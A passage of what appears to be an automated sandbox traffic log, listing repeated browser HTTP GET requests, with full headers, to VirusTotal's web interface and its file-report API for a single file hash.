          Source: global trafficHTTP traffic detected: GET /gui/58912.318758154ac26af8c8bf.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/67119.0f2e302c9bd4920403eb.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/13870.5eac014aaa55fec657a1.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/submissions/add HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/6829.6c727ee07d052c60889f.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/19739.d25d76e348ff4042df61.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/26603.b1862f8ab179e4a6fcde.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/65237.b9cde27c36caed16055e.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/55336.395909bfc12937421b2d.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/9234.4895d7a797c4dbf3a58b.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/36619.68cafafc7df311d6c6b7.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/34386.8514664b2d3faf72fdd8.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/78746.44345289eed2d4982ef7.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/16756.15df081c2329888e4ed1.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/87027.b53dee6a7718580c76f9.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/39406.01e4b51877a7f7c287bf.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/73581.c40f4c346950a7606c39.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/65127.d20da69ed29d077cb338.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/74552.2e8192dc6c15c665f808.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTQyNTY3OTQ4NDItWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ1NQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/dropped_files HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTMxODcyOTI0NjctWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ5NQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_urls HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTQxMjE3MDM3MjktWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ5Ng==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_domains HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTgwOTUwMjgzNTktWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ5Ng==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_ips HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTU4Nzg0MTA1NjYtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ5Ng==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/execution_parents HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTg3MTQ1MzcwNTQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ5Ng==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/1fc6c01d1812fbfbaa47.woff2 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.virustotal.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.virustotal.com/gui/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_urls HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_parents HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTg5OTIyMjIxNzItWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ5Ng==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_ips HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/bundled_files HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTk2NzM5OTgxMjUtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ5Nw==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_children HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTM2NDU4NDAwNDktWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ5Nw==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/execution_parents HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
